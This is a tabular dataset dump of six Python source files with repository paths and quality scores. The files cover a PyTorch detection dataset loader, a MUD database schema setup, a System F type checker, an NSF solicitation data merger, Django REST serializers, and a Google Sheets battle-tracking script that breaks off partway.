code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import json
import os
import numpy as np
import torch
import torch.utils.data
from PIL import Image
class StaffDataset(torch.utils.data.Dataset):
def __init__(self, root, transforms=None):
self.root = root
self.transforms = transforms
# load all image files, sorting them to
# ensure that they are aligned
self.imgs = list(sorted(os.listdir(os.path.join(root, "images"))))
self.annotations = list(sorted(os.listdir(os.path.join(root, "annotations"))))
self.image_sizes = {}
def __getitem__(self, idx):
# load images ad annotations
img_path = os.path.join(self.root, "images", self.imgs[idx])
ann_path = os.path.join(self.root, "annotations", self.annotations[idx])
img = Image.open(img_path).convert("RGB")
with open(ann_path, 'r') as f:
annot_d = json.load(f, encoding='utf-8')
annotations = annot_d['annotations']
image_size = annot_d['image_size']
if not self.image_sizes.get(idx):
self.image_sizes[idx] = image_size
num_objs = len(annotations)
boxes = []
for annot in annotations:
xmin = annot['left']
ymin = annot['top']
width = annot['width']
height = annot['height']
xmax = xmin + width
ymax = ymin + height
box = [xmin, ymin, xmax, ymax]
boxes.append(box)
# there is only one class
labels = torch.ones((num_objs,), dtype=torch.int64)
boxes = torch.as_tensor(boxes, dtype=torch.int16)
image_id = torch.tensor([idx])
area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])
# suppose all instances are not crowd
iscrowd = torch.zeros((num_objs,), dtype=torch.int64)
bad_boxes = (boxes[:, 3] <= boxes[:, 1]) | (boxes[:, 2] <= boxes[:, 0])
for bad_box in boxes[bad_boxes]:
print(f'BAD: {bad_box} in {self.imgs[idx]}')
keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
boxes = boxes[keep]
labels = labels[keep]
area = area[keep]
iscrowd = iscrowd[keep]
target = {}
target["boxes"] = boxes
target["labels"] = labels
target["image_id"] = image_id
target["area"] = area
target["iscrowd"] = iscrowd
if self.transforms is not None:
img, target = self.transforms(img, target)
return img, target
def __len__(self):
return len(self.imgs)
def get_height_and_width(self, idx):
image_size = self.image_sizes.get(idx)
if not image_size:
ann_path = os.path.join(self.root, "annotations", self.annotations[idx])
with open(ann_path, 'r') as f:
image_size = json.load(f, encoding='utf-8')['image_size']
return [image_size['height'], image_size['width']] | references/detection/staff_dataset.py | import json
import os
import numpy as np
import torch
import torch.utils.data
from PIL import Image
class StaffDataset(torch.utils.data.Dataset):
def __init__(self, root, transforms=None):
self.root = root
self.transforms = transforms
# load all image files, sorting them to
# ensure that they are aligned
self.imgs = list(sorted(os.listdir(os.path.join(root, "images"))))
self.annotations = list(sorted(os.listdir(os.path.join(root, "annotations"))))
self.image_sizes = {}
def __getitem__(self, idx):
# load images ad annotations
img_path = os.path.join(self.root, "images", self.imgs[idx])
ann_path = os.path.join(self.root, "annotations", self.annotations[idx])
img = Image.open(img_path).convert("RGB")
with open(ann_path, 'r') as f:
annot_d = json.load(f, encoding='utf-8')
annotations = annot_d['annotations']
image_size = annot_d['image_size']
if not self.image_sizes.get(idx):
self.image_sizes[idx] = image_size
num_objs = len(annotations)
boxes = []
for annot in annotations:
xmin = annot['left']
ymin = annot['top']
width = annot['width']
height = annot['height']
xmax = xmin + width
ymax = ymin + height
box = [xmin, ymin, xmax, ymax]
boxes.append(box)
# there is only one class
labels = torch.ones((num_objs,), dtype=torch.int64)
boxes = torch.as_tensor(boxes, dtype=torch.int16)
image_id = torch.tensor([idx])
area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])
# suppose all instances are not crowd
iscrowd = torch.zeros((num_objs,), dtype=torch.int64)
bad_boxes = (boxes[:, 3] <= boxes[:, 1]) | (boxes[:, 2] <= boxes[:, 0])
for bad_box in boxes[bad_boxes]:
print(f'BAD: {bad_box} in {self.imgs[idx]}')
keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
boxes = boxes[keep]
labels = labels[keep]
area = area[keep]
iscrowd = iscrowd[keep]
target = {}
target["boxes"] = boxes
target["labels"] = labels
target["image_id"] = image_id
target["area"] = area
target["iscrowd"] = iscrowd
if self.transforms is not None:
img, target = self.transforms(img, target)
return img, target
def __len__(self):
return len(self.imgs)
def get_height_and_width(self, idx):
image_size = self.image_sizes.get(idx)
if not image_size:
ann_path = os.path.join(self.root, "annotations", self.annotations[idx])
with open(ann_path, 'r') as f:
image_size = json.load(f, encoding='utf-8')['image_size']
return [image_size['height'], image_size['width']] | 0.65202 | 0.305432 |
import os
from shinymud.models import __file__ as model_file
from shinymud.lib.world import World
model_path = os.path.abspath(os.path.dirname(model_file))
model_files = [f[:-3] for f in os.listdir(model_path) if f.endswith('.py') and not f.startswith(('_','.'))]
for module in model_files:
temp = __import__('shinymud.models.%s' % module, globals(), locals(), [])
from shinymud.models import model_list
EXISTING_TABLES = {}
def initialize_database():
world = World.get_world()
world.db.conn.cursor().execute('PRAGMA foreign_keys = true')
db_table_names = [x['name'] for x in world.db.select("name from sqlite_master where type='table'")]
for table_name in db_table_names:
columns = world.db.select("* from %s limit 1" % table_name)
if columns and len(columns):
EXISTING_TABLES[table_name] = columns[0].keys()
for mod in model_list.values():
if mod.db_table_name not in EXISTING_TABLES:
create_table(mod)
for mod in model_list.values():
for col in mod.db_columns:
if col.name not in EXISTING_TABLES[mod.db_table_name]:
add_column(mod, col.name)
def create_table(model):
if model.db_table_name in EXISTING_TABLES:
return
# check for dependencies
dependencies = [col.foreign_key for col in model.db_columns if col.foreign_key and col.foreign_key[0] != model.db_table_name]
for mod, col in dependencies:
M = model_list.get(mod)
if not M:
raise Exception('Dependency on unknown model: %s' % str(mod))
if M.db_table_name not in EXISTING_TABLES:
create_table(M)
elif col not in EXISTING_TABLES[M.db_table_name]:
add_column(M, col)
# generate create table string
table_string = []
table_string.append('CREATE TABLE IF NOT EXISTS %s (' % model.db_table_name)
columns_string = []
for col in model.db_columns:
columns_string.append(str(col))
for extra in model.db_extras:
columns_string.append(unicode(extra))
table_string.append(','.join(columns_string))
table_string.append(')')
create_stmt = "".join(table_string)
cursor = World.get_world().db.conn.cursor()
cursor.execute(create_stmt)
EXISTING_TABLES[model.db_table_name] = [col.name for col in model.db_columns]
def add_column(mod, col):
# check for dependencies
if mod.db_table_name not in EXISTING_TABLES:
create_table(mod)
else:
if col in EXISTING_TABLES[mod.db_table_name]:
return # Column already exists!?
column = None
for c in mod.db_columns:
if c.name == col:
column = c
break
if not column:
raise Exception('Trying to create undefined column!')
if column.foreign_key:
m, c = column.foreign_key
M = model_list.get(m)
if M.db_table_name not in EXISTING_TABLES:
create_table(M)
elif c not in EXISTING_TABLES[M.db_table_name]:
add_column(M, c)
alter_stmt = 'ALTER TABLE %s ADD COLUMN %s' % (mod.db_table_name, str(column))
cursor = World.get_world().db.conn.cursor()
cursor.execute(alter_stmt)
EXISTING_TABLES[mod.db_table_name].append(col) | src/shinymud/lib/setup.py | import os
from shinymud.models import __file__ as model_file
from shinymud.lib.world import World
model_path = os.path.abspath(os.path.dirname(model_file))
model_files = [f[:-3] for f in os.listdir(model_path) if f.endswith('.py') and not f.startswith(('_','.'))]
for module in model_files:
temp = __import__('shinymud.models.%s' % module, globals(), locals(), [])
from shinymud.models import model_list
EXISTING_TABLES = {}
def initialize_database():
world = World.get_world()
world.db.conn.cursor().execute('PRAGMA foreign_keys = true')
db_table_names = [x['name'] for x in world.db.select("name from sqlite_master where type='table'")]
for table_name in db_table_names:
columns = world.db.select("* from %s limit 1" % table_name)
if columns and len(columns):
EXISTING_TABLES[table_name] = columns[0].keys()
for mod in model_list.values():
if mod.db_table_name not in EXISTING_TABLES:
create_table(mod)
for mod in model_list.values():
for col in mod.db_columns:
if col.name not in EXISTING_TABLES[mod.db_table_name]:
add_column(mod, col.name)
def create_table(model):
if model.db_table_name in EXISTING_TABLES:
return
# check for dependencies
dependencies = [col.foreign_key for col in model.db_columns if col.foreign_key and col.foreign_key[0] != model.db_table_name]
for mod, col in dependencies:
M = model_list.get(mod)
if not M:
raise Exception('Dependency on unknown model: %s' % str(mod))
if M.db_table_name not in EXISTING_TABLES:
create_table(M)
elif col not in EXISTING_TABLES[M.db_table_name]:
add_column(M, col)
# generate create table string
table_string = []
table_string.append('CREATE TABLE IF NOT EXISTS %s (' % model.db_table_name)
columns_string = []
for col in model.db_columns:
columns_string.append(str(col))
for extra in model.db_extras:
columns_string.append(unicode(extra))
table_string.append(','.join(columns_string))
table_string.append(')')
create_stmt = "".join(table_string)
cursor = World.get_world().db.conn.cursor()
cursor.execute(create_stmt)
EXISTING_TABLES[model.db_table_name] = [col.name for col in model.db_columns]
def add_column(mod, col):
# check for dependencies
if mod.db_table_name not in EXISTING_TABLES:
create_table(mod)
else:
if col in EXISTING_TABLES[mod.db_table_name]:
return # Column already exists!?
column = None
for c in mod.db_columns:
if c.name == col:
column = c
break
if not column:
raise Exception('Trying to create undefined column!')
if column.foreign_key:
m, c = column.foreign_key
M = model_list.get(m)
if M.db_table_name not in EXISTING_TABLES:
create_table(M)
elif c not in EXISTING_TABLES[M.db_table_name]:
add_column(M, c)
alter_stmt = 'ALTER TABLE %s ADD COLUMN %s' % (mod.db_table_name, str(column))
cursor = World.get_world().db.conn.cursor()
cursor.execute(alter_stmt)
EXISTING_TABLES[mod.db_table_name].append(col) | 0.140985 | 0.208461 |
from typing import TypeVar
from uuid import UUID, uuid4
from magicpy.STLC import Env, ConsEnv, NilEnv
A = TypeVar("A")
def true(x: A, y: A) -> A:
return x
class Type:
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
...
def gen_uuid(self) -> 'Type':
...
def apply_uuid(self, v: 'TVal') -> 'Type':
...
class TVal(Type):
x: str
uid: UUID
def __init__(self, x, uid=None):
self.x = x
self.uid = uid
def __str__(self):
return self.x
def __eq__(self, other):
return self.uid == other.uid if other is not None and isinstance(other, TVal) else False
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
return t if self == x else self
def gen_uuid(self) -> 'Type':
return self
def apply_uuid(self, v: 'TVal') -> 'Type':
return TVal(self.x, v.uid) if self.x == v.x else self
class TForall(Type):
x: TVal
e: Type
def __init__(self, x, e):
self.x = x
self.e = e
def __str__(self):
return f"(∀ {self.x}. {self.e})"
def __eq__(self, other):
if self is other:
return True
elif other is not None and isinstance(other, TForall):
return self.e == other.e.apply(other.x, self.x)
else:
return False
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
return self if self.x == x else self.e.apply(x, t)
def gen_uuid(self) -> 'Type':
if self.x.uid is None:
v = TVal(self.x.x, uuid4())
return TForall(v, self.e.apply_uuid(v).gen_uuid())
return TForall(self.x, self.e.gen_uuid())
def apply_uuid(self, v: 'TVal') -> 'Type':
return self if self.x.x == v.x else TForall(self.x, self.e.apply_uuid(v))
class TArr(Type):
a: Type
b: Type
def __init__(self, a, b):
self.a = a
self.b = b
def __str__(self):
return f"({self.a} -> {self.b})"
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
return TArr(self.a.apply(x, t), self.b.apply(x, t))
def gen_uuid(self) -> 'Type':
return TArr(self.a.gen_uuid(), self.b.gen_uuid())
def apply_uuid(self, v: 'TVal') -> 'Type':
return TArr(self.a.apply_uuid(v), self.b.apply_uuid(v))
class Expr:
def check_type(self, env: Env) -> Type:
...
def gen_uuid(self) -> 'Expr':
...
def apply_uuid(self, v: TVal) -> 'Expr':
...
class Val(Expr):
x: str
t: Type
def __init__(self, x, t=None):
self.x = x
self.t = t
def check_type(self, env: Env) -> Type:
return self.t if self.t is not None else env.lookup(self.x)
def gen_uuid(self) -> 'Expr':
return Val(self.x, self.t.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return self if self.t is not None else Val(self.x, v.gen_uuid())
class Fun(Expr):
x: Val
e: Expr
def __init__(self, x, e):
self.x = x
self.e = e
def check_type(self, env: Env) -> Type:
return TArr(self.x.t, self.e.check_type(ConsEnv(self.x, env)))
def gen_uuid(self) -> 'Expr':
return Fun(self.x.gen_uuid(), self.e.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return Fun(self.x.apply_uuid(v), self.e.apply_uuid(v))
class App(Expr):
f: Expr
x: Expr
def __init__(self, f, x):
self.f = f
self.x = x
def check_type(self, env: Env) -> Type:
tf: Type = self.f.check_type(env)
if isinstance(tf, TArr) and tf.a == self.x.check_type(env):
return tf.b
raise TypeError()
def gen_uuid(self) -> 'Expr':
return App(self.f.gen_uuid(), self.x.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return App(self.f.apply_uuid(v), self.x.apply_uuid(v))
class Forall(Expr):
x: TVal
e: Expr
def __init__(self, x, e):
self.x = x
self.e = e
def check_type(self, env: Env) -> Type:
return TForall(self.x, self.e.check_type(env))
def gen_uuid(self) -> 'Expr':
if self.x.uid is None:
v = TVal(self.x.x, uuid4())
return Forall(v, self.e.apply_uuid(v).gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return self if self.x.x == v.x else Forall(self.x, self.e.apply_uuid(v))
class AppT(Expr):
e: Expr
t: Type
def __init__(self, e, t):
self.e = e
self.t = t
def check_type(self, env: Env) -> Type:
te = self.e.check_type(env)
if isinstance(te, TForall):
return te.e.apply(te.x, self.t)
raise TypeError()
def gen_uuid(self) -> 'Expr':
return AppT(self.e.gen_uuid(), self.t.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return AppT(self.e.apply_uuid(v), self.t.apply_uuid(v)) | magicpy/SystemF.py | from typing import TypeVar
from uuid import UUID, uuid4
from magicpy.STLC import Env, ConsEnv, NilEnv
A = TypeVar("A")
def true(x: A, y: A) -> A:
return x
class Type:
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
...
def gen_uuid(self) -> 'Type':
...
def apply_uuid(self, v: 'TVal') -> 'Type':
...
class TVal(Type):
x: str
uid: UUID
def __init__(self, x, uid=None):
self.x = x
self.uid = uid
def __str__(self):
return self.x
def __eq__(self, other):
return self.uid == other.uid if other is not None and isinstance(other, TVal) else False
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
return t if self == x else self
def gen_uuid(self) -> 'Type':
return self
def apply_uuid(self, v: 'TVal') -> 'Type':
return TVal(self.x, v.uid) if self.x == v.x else self
class TForall(Type):
x: TVal
e: Type
def __init__(self, x, e):
self.x = x
self.e = e
def __str__(self):
return f"(∀ {self.x}. {self.e})"
def __eq__(self, other):
if self is other:
return True
elif other is not None and isinstance(other, TForall):
return self.e == other.e.apply(other.x, self.x)
else:
return False
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
return self if self.x == x else self.e.apply(x, t)
def gen_uuid(self) -> 'Type':
if self.x.uid is None:
v = TVal(self.x.x, uuid4())
return TForall(v, self.e.apply_uuid(v).gen_uuid())
return TForall(self.x, self.e.gen_uuid())
def apply_uuid(self, v: 'TVal') -> 'Type':
return self if self.x.x == v.x else TForall(self.x, self.e.apply_uuid(v))
class TArr(Type):
a: Type
b: Type
def __init__(self, a, b):
self.a = a
self.b = b
def __str__(self):
return f"({self.a} -> {self.b})"
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
return TArr(self.a.apply(x, t), self.b.apply(x, t))
def gen_uuid(self) -> 'Type':
return TArr(self.a.gen_uuid(), self.b.gen_uuid())
def apply_uuid(self, v: 'TVal') -> 'Type':
return TArr(self.a.apply_uuid(v), self.b.apply_uuid(v))
class Expr:
def check_type(self, env: Env) -> Type:
...
def gen_uuid(self) -> 'Expr':
...
def apply_uuid(self, v: TVal) -> 'Expr':
...
class Val(Expr):
x: str
t: Type
def __init__(self, x, t=None):
self.x = x
self.t = t
def check_type(self, env: Env) -> Type:
return self.t if self.t is not None else env.lookup(self.x)
def gen_uuid(self) -> 'Expr':
return Val(self.x, self.t.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return self if self.t is not None else Val(self.x, v.gen_uuid())
class Fun(Expr):
x: Val
e: Expr
def __init__(self, x, e):
self.x = x
self.e = e
def check_type(self, env: Env) -> Type:
return TArr(self.x.t, self.e.check_type(ConsEnv(self.x, env)))
def gen_uuid(self) -> 'Expr':
return Fun(self.x.gen_uuid(), self.e.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return Fun(self.x.apply_uuid(v), self.e.apply_uuid(v))
class App(Expr):
f: Expr
x: Expr
def __init__(self, f, x):
self.f = f
self.x = x
def check_type(self, env: Env) -> Type:
tf: Type = self.f.check_type(env)
if isinstance(tf, TArr) and tf.a == self.x.check_type(env):
return tf.b
raise TypeError()
def gen_uuid(self) -> 'Expr':
return App(self.f.gen_uuid(), self.x.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return App(self.f.apply_uuid(v), self.x.apply_uuid(v))
class Forall(Expr):
x: TVal
e: Expr
def __init__(self, x, e):
self.x = x
self.e = e
def check_type(self, env: Env) -> Type:
return TForall(self.x, self.e.check_type(env))
def gen_uuid(self) -> 'Expr':
if self.x.uid is None:
v = TVal(self.x.x, uuid4())
return Forall(v, self.e.apply_uuid(v).gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return self if self.x.x == v.x else Forall(self.x, self.e.apply_uuid(v))
class AppT(Expr):
e: Expr
t: Type
def __init__(self, e, t):
self.e = e
self.t = t
def check_type(self, env: Env) -> Type:
te = self.e.check_type(env)
if isinstance(te, TForall):
return te.e.apply(te.x, self.t)
raise TypeError()
def gen_uuid(self) -> 'Expr':
return AppT(self.e.gen_uuid(), self.t.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return AppT(self.e.apply_uuid(v), self.t.apply_uuid(v)) | 0.835651 | 0.464841 |
import ujson
basedir = os.path.join( os.path.dirname( __file__ ), '..' )
with open(os.path.join(basedir, "data", "solicitations","combined", "nsf_solicitations_2001-2016.json"), "w") as out:
# track matches
opps_in_api_data = []
for year in range(1,16):
if year < 10:
strYear = "0"+str(year)
else:
strYear = str(year)
# print strYear
with open("data/solicitations/api/nsf20" + strYear + ".json", "r") as api:
api = eval(api.read())
with open("data/solicitations/scraped/nsf_solicitation_prog_elem_nums.json", "r") as scraped:
scraped = scraped.readlines()
for api_doc in api:
# print type(api_doc)
api_doc = api_doc[0]
for scraped_doc in scraped:
scraped_doc = ujson.loads(scraped_doc)
if scraped_doc["funding_opportunity_number"] == api_doc["FundingOpportunityNumber"]:
opps_in_api_data.append(scraped_doc["funding_opportunity_number"])
for key, value in scraped_doc.iteritems():
if not key == "funding_opportunity_number" and not key == "opportunity_name":
api_doc[key] = value
out.write(ujson.dumps(api_doc) + "\n")
print len(opps_in_api_data)
# If a opportunity number that was scraped is not found in the data scraped via the API, just add in doc with what we have from scraping
with open(os.path.join(basedir, "data", "solicitations", "scraped", "nsf_solicitation_prog_elem_nums.json"), "r") as scraped:
scraped = scraped.readlines()
for scraped_doc in scraped:
scraped_doc = ujson.loads(scraped_doc)
if not scraped_doc["funding_opportunity_number"] in opps_in_api_data:
partial_doc = {}
for key, value in scraped_doc.iteritems():
if key == "funding_opportunity_number":
partial_doc["FundingOpportunityNumber"] = scraped_doc["funding_opportunity_number"]
elif key == "opportunity_name":
partial_doc["FundingOpportunityTitle"] = scraped_doc["opportunity_name"]
else:
partial_doc[key] = value
partial_doc["CFDANumber"] = "n/a"
partial_doc["CompetitionID"] = "n/a"
partial_doc["OpeningDate"] = "n/a"
partial_doc["ClosingDate"] = "n/a"
partial_doc["OfferingAgency"] = "n/a"
partial_doc["AgencyContactInfo"] = "n/a"
partial_doc["CFDADescription"] = "n/a"
partial_doc["SchemaURL"] = "n/a"
partial_doc["InstructionsURL"] = "n/a"
partial_doc["IsMultiProject"] = "n/a"
out.write(ujson.dumps(partial_doc) + "\n") | agencies/NSF/data_scripts/3.join_solication_scrape_and_api.py | import ujson
basedir = os.path.join( os.path.dirname( __file__ ), '..' )
with open(os.path.join(basedir, "data", "solicitations","combined", "nsf_solicitations_2001-2016.json"), "w") as out:
# track matches
opps_in_api_data = []
for year in range(1,16):
if year < 10:
strYear = "0"+str(year)
else:
strYear = str(year)
# print strYear
with open("data/solicitations/api/nsf20" + strYear + ".json", "r") as api:
api = eval(api.read())
with open("data/solicitations/scraped/nsf_solicitation_prog_elem_nums.json", "r") as scraped:
scraped = scraped.readlines()
for api_doc in api:
# print type(api_doc)
api_doc = api_doc[0]
for scraped_doc in scraped:
scraped_doc = ujson.loads(scraped_doc)
if scraped_doc["funding_opportunity_number"] == api_doc["FundingOpportunityNumber"]:
opps_in_api_data.append(scraped_doc["funding_opportunity_number"])
for key, value in scraped_doc.iteritems():
if not key == "funding_opportunity_number" and not key == "opportunity_name":
api_doc[key] = value
out.write(ujson.dumps(api_doc) + "\n")
print len(opps_in_api_data)
# If a opportunity number that was scraped is not found in the data scraped via the API, just add in doc with what we have from scraping
with open(os.path.join(basedir, "data", "solicitations", "scraped", "nsf_solicitation_prog_elem_nums.json"), "r") as scraped:
scraped = scraped.readlines()
for scraped_doc in scraped:
scraped_doc = ujson.loads(scraped_doc)
if not scraped_doc["funding_opportunity_number"] in opps_in_api_data:
partial_doc = {}
for key, value in scraped_doc.iteritems():
if key == "funding_opportunity_number":
partial_doc["FundingOpportunityNumber"] = scraped_doc["funding_opportunity_number"]
elif key == "opportunity_name":
partial_doc["FundingOpportunityTitle"] = scraped_doc["opportunity_name"]
else:
partial_doc[key] = value
partial_doc["CFDANumber"] = "n/a"
partial_doc["CompetitionID"] = "n/a"
partial_doc["OpeningDate"] = "n/a"
partial_doc["ClosingDate"] = "n/a"
partial_doc["OfferingAgency"] = "n/a"
partial_doc["AgencyContactInfo"] = "n/a"
partial_doc["CFDADescription"] = "n/a"
partial_doc["SchemaURL"] = "n/a"
partial_doc["InstructionsURL"] = "n/a"
partial_doc["IsMultiProject"] = "n/a"
out.write(ujson.dumps(partial_doc) + "\n") | 0.076572 | 0.169028 |
from rest_framework import serializers
from rest_framework.reverse import reverse
from rdmo.conditions.models import Condition
from rdmo.core.serializers import TranslationSerializerMixin
from rdmo.core.utils import get_language_warning
from rdmo.questions.models import QuestionSet
from ..models import Option, OptionSet
from ..validators import OptionSetUniqueKeyValidator, OptionUniquePathValidator
class QuestionSetSerializer(serializers.ModelSerializer):
class Meta:
model = QuestionSet
fields = (
'id',
'key'
)
class ConditionSerializer(serializers.ModelSerializer):
class Meta:
model = Condition
fields = (
'id',
'key'
)
class OptionSetSerializer(serializers.ModelSerializer):
questionsets = QuestionSetSerializer(many=True, read_only=True)
class Meta:
model = OptionSet
fields = (
'id',
'uri_prefix',
'key',
'comment',
'order',
'provider_key',
'conditions',
'questionsets'
)
validators = (OptionSetUniqueKeyValidator(), )
class OptionSerializer(TranslationSerializerMixin, serializers.ModelSerializer):
optionset = serializers.PrimaryKeyRelatedField(queryset=OptionSet.objects.all(), required=True)
conditions = ConditionSerializer(many=True, read_only=True)
class Meta:
model = Option
fields = (
'id',
'optionset',
'uri_prefix',
'key',
'comment',
'order',
'text',
'label',
'additional_input',
'conditions'
)
trans_fields = (
'text',
)
validators = (OptionUniquePathValidator(), )
class OptionSetIndexSerializer(serializers.ModelSerializer):
class Meta:
model = OptionSet
fields = (
'id',
'key',
)
class OptionIndexSerializer(serializers.ModelSerializer):
class Meta:
model = Option
fields = (
'id',
'optionset',
'key',
'text'
)
class ProviderNestedSerializer(serializers.Serializer):
key = serializers.CharField()
label = serializers.CharField()
class_name = serializers.CharField()
class Meta:
fields = (
'key',
'label',
'class_name'
)
class OptionNestedSerializer(serializers.ModelSerializer):
warning = serializers.SerializerMethodField()
xml_url = serializers.SerializerMethodField()
class Meta:
model = Option
fields = (
'id',
'uri_prefix',
'path',
'text',
'warning',
'xml_url'
)
def get_warning(self, obj):
return get_language_warning(obj, 'text')
def get_xml_url(self, obj):
return reverse('v1-options:option-detail-export', args=[obj.pk])
class OptionSetNestedSerializer(serializers.ModelSerializer):
options = OptionNestedSerializer(many=True)
provider = ProviderNestedSerializer()
xml_url = serializers.SerializerMethodField()
class Meta:
model = OptionSet
fields = (
'id',
'uri_prefix',
'key',
'provider',
'options',
'xml_url'
)
def get_xml_url(self, obj):
return reverse('v1-options:optionset-detail-export', args=[obj.pk]) | rdmo/options/serializers/v1.py | from rest_framework import serializers
from rest_framework.reverse import reverse
from rdmo.conditions.models import Condition
from rdmo.core.serializers import TranslationSerializerMixin
from rdmo.core.utils import get_language_warning
from rdmo.questions.models import QuestionSet
from ..models import Option, OptionSet
from ..validators import OptionSetUniqueKeyValidator, OptionUniquePathValidator
class QuestionSetSerializer(serializers.ModelSerializer):
class Meta:
model = QuestionSet
fields = (
'id',
'key'
)
class ConditionSerializer(serializers.ModelSerializer):
class Meta:
model = Condition
fields = (
'id',
'key'
)
class OptionSetSerializer(serializers.ModelSerializer):
questionsets = QuestionSetSerializer(many=True, read_only=True)
class Meta:
model = OptionSet
fields = (
'id',
'uri_prefix',
'key',
'comment',
'order',
'provider_key',
'conditions',
'questionsets'
)
validators = (OptionSetUniqueKeyValidator(), )
class OptionSerializer(TranslationSerializerMixin, serializers.ModelSerializer):
optionset = serializers.PrimaryKeyRelatedField(queryset=OptionSet.objects.all(), required=True)
conditions = ConditionSerializer(many=True, read_only=True)
class Meta:
model = Option
fields = (
'id',
'optionset',
'uri_prefix',
'key',
'comment',
'order',
'text',
'label',
'additional_input',
'conditions'
)
trans_fields = (
'text',
)
validators = (OptionUniquePathValidator(), )
class OptionSetIndexSerializer(serializers.ModelSerializer):
class Meta:
model = OptionSet
fields = (
'id',
'key',
)
class OptionIndexSerializer(serializers.ModelSerializer):
class Meta:
model = Option
fields = (
'id',
'optionset',
'key',
'text'
)
class ProviderNestedSerializer(serializers.Serializer):
key = serializers.CharField()
label = serializers.CharField()
class_name = serializers.CharField()
class Meta:
fields = (
'key',
'label',
'class_name'
)
class OptionNestedSerializer(serializers.ModelSerializer):
warning = serializers.SerializerMethodField()
xml_url = serializers.SerializerMethodField()
class Meta:
model = Option
fields = (
'id',
'uri_prefix',
'path',
'text',
'warning',
'xml_url'
)
def get_warning(self, obj):
return get_language_warning(obj, 'text')
def get_xml_url(self, obj):
return reverse('v1-options:option-detail-export', args=[obj.pk])
class OptionSetNestedSerializer(serializers.ModelSerializer):
options = OptionNestedSerializer(many=True)
provider = ProviderNestedSerializer()
xml_url = serializers.SerializerMethodField()
class Meta:
model = OptionSet
fields = (
'id',
'uri_prefix',
'key',
'provider',
'options',
'xml_url'
)
def get_xml_url(self, obj):
return reverse('v1-options:optionset-detail-export', args=[obj.pk]) | 0.694303 | 0.116966 |
from pickle import load, dump
from os.path import exists, dirname, join
from threading import Thread, RLock
from datetime import datetime
from utils.log import FileLogger
from utils.timer import get_settlement_time_object
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
_scopes = ['https://www.googleapis.com/auth/spreadsheets']
_creds_path = join(dirname(__file__), 'credentials.json')
_pickle_path = join(dirname(__file__), 'token.pickle')
_sheet_id_path = join(dirname(__file__), 'sheet.id')
_creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if exists(_pickle_path):
with open(_pickle_path, 'rb') as token:
_creds = load(token)
# If there are no (valid) credentials available, let the user log in.
if not _creds or not _creds.valid:
if _creds and _creds.expired and _creds.refresh_token:
_creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(_creds_path, _scopes)
_creds = flow.run_console()
# Save the credentials for the next run
with open(_pickle_path, 'wb') as token:
dump(_creds, token)
_service = build('sheets', 'v4', credentials=_creds)
_spreadsheet_id = ''
_start_date = datetime.now()
_player_list = {}
_undo = {}
_undo['undostack'] = []
_undo['redostack'] = []
_sheet_lock = RLock()
def get_sheets_id():
global _spreadsheet_id
return _spreadsheet_id
def read_sheet(range_name):
try:
sheets = _service.spreadsheets()
result = sheets.values().get(spreadsheetId=_spreadsheet_id, range=range_name).execute()
except Exception as e:
FileLogger.error(f'Fail to read sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
return
return result.get('values', [])
def write_sheet(range_name, body, option='RAW'):
try:
sheets = _service.spreadsheets()
result = sheets.values().update(spreadsheetId=_spreadsheet_id, range=range_name, body=body, valueInputOption=option).execute()
except Exception as e:
FileLogger.error(f'Fail to write sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
return
return result
def append_sheet(range_name, body, option='RAW'):
try:
sheets = _service.spreadsheets()
result = sheets.values().append(spreadsheetId=_spreadsheet_id, range=range_name, body=body, valueInputOption=option).execute()
except Exception as e:
FileLogger.error(f'Fail to append sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
return
return result
def get_start_date():
global _start_date
values = read_sheet('隊員列表!A1:A1')
if not values:
FileLogger.error('No start date found.')
return None
else:
date_tokens = values[0][0].split('/')
settlement_time = get_settlement_time_object()
_start_date = datetime(year=int(date_tokens[0]), month=int(date_tokens[1]), day=int(date_tokens[2])).replace(tzinfo=settlement_time.tzinfo)
return _start_date
def get_player_list():
global _player_list
values = read_sheet('隊員列表!B2:C')
if not values:
FileLogger.error('No player list found.')
return None
else:
_player_list = {}
for row in values:
_player_list[int(row[1])] = row[0]
return _player_list
def switch_sheets(sheet_id):
global _spreadsheet_id
_spreadsheet_id = sheet_id
start_date = get_start_date()
player_list = get_player_list()
with open(_sheet_id_path, 'w') as f:
f.write(_spreadsheet_id)
return _spreadsheet_id, start_date, player_list
def fill_sheet(player_discord_id, description, play_number, boss_tag, damage, play_option, play_miss):
global _undo, _sheet_lock
if player_discord_id not in _player_list:
FileLogger.warn(f'Discord ID: {player_discord_id} not found in sheet')
return False
player_nickname = _player_list[player_discord_id]
today = get_settlement_time_object()
play_tag = f"{play_number}{'B' if play_option == '補' else 'A'}"
